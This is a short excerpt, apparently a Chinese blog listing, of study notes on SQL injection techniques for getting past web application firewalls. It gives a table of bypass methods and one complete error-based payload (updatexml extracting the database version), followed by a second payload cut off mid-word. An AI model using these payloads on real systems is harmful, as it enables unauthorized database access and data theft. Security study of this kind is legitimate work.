SQL注入绕waf
SQL注入绕waf总结笔记0x01 注释绕过0x02 绕过and、or0x03 绕过空格、注释、and、or0x04 绕过空格的方法0x05 绕过引号0x06hex编码绕waf0x07 无法使用infomation_schema的布尔盲注0x08 绕过=、空格、and、or、逗号
0x01 注释绕过
?id=1' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) or '1'='1
0x02 绕过and、or
?id=1'||extractva
原创
2020-09-15 14:06:21 ·
190 阅读 ·
0 评论